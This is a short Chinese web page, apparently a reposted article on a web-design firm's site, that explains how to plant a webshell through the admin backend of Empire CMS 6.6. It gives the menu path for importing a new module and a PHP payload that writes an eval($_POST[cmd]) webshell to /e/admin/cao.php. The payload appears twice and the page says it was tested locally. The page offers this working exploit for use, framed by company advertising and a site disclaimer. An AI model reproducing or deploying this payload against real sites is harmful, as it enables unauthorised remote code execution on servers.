帝国cms后台getshell

见http://www.wooyun.org/bugs/wooyun-2010-03787

创新互联公司主要从事网站制作、成都网站建设、网页设计、企业做网站、公司建网站等业务。立足成都服务黄山区,十余年网站建设经验,价格优惠、服务专业,欢迎来电咨询建站服务:028-86922220

以前6.5的有人发的方法是,(进入后台---系统设置---管理数据表---管理系统模型---导入新型模块,直接把修改过的php的shell改名为shell.php.mod上传,新版使用uploadm~num.php来递增数字)发现6.6不行,上传之后会变成类似uploadm1324885505nXmTdQamQq.php这样的!

换了个办法其实也很简单<?fputs(fopen("cao.php","w"),"<?eval(\$_POST[cmd]);?>")?> 保存为1.php.mod 然后还是进入后台---系统设置---管理数据表---管理系统模型---导入新型模块,上传之后马儿就躺在了/e/admin/cao.php了

本地6.6测试通过

<?fputs(fopen("cao.php","w"),"<?eval(\$_POST[cmd]);?>")?>

帝国cms 后台getshell

名称栏目:帝国cms后台getshell
本文链接:/article22/jpscjc.html

成都网站建设公司_创新互联,为您提供星空体育app最新版本(2024已更新)小程序开发网站改版全网营销推广品牌网站设计网站设计

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联

成都做网站